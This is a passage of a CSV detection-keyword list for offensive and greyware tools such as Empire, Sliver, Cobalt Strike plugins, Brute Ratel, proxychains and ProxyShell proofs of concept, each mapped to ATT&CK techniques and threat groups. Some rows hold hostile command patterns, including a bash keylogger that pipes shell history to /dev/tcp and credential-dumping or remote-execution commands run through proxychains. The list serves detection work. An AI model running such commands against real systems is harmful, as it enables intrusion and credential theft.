T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Processus-Thief/HEKATOMB*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*ProcessWinSCPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*produkey.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*produkey_setup.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*produkey-x64.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*profiles generate --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new beacon *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*ProgIDsUACBypass.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*program/replay.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*projectdiscovery/interactsh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*prosody2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*prowler gcp --credentials-file path*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Proxmark*","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/Proxmark/proxmark3","1","1","N/A","N/A","10","2872","891","2021-03-30T06:59:59Z","2014-03-16T23:36:31Z" +"*proxmark3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Proxy bypass enabled for Neo4j connection*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*Proxy Shellcode Handler*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*proxy.py --dns * --dns_port * --clients*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*proxy_bypass.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*proxy_cmd_for_exec_by_sibling*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*proxy_linux_amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*proxychains -*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains atexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains dcomexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains nmap -sT * -p * -Pn -A*","offensive_tool_keyword","ligolo","proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*proxychains nmap*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains psexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains rdesktop *","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*proxychains secretsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains smbclient -L *","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains smbexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains telnet*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains wmiexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*proxychains*scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*proxychains.conf*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains.lsm*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains.sourceforge.net*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains-master*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*proxychains-other.conf*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*Proxy-DLL-Loads*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*proxyDllLoads.c*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*proxyDllLoads.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*proxyLogon.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*proxyshell.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*proxyshell_rce.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A",,"N/A",,, +"*proxyshellcodeurl*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*proxyshell-enumerate.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A",,"N/A",,, +"*proxyshell-poc*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A",,"N/A",,, +"*ps_token2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ps_wmi_exec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ps2exe -*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe *.ps1*.exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" 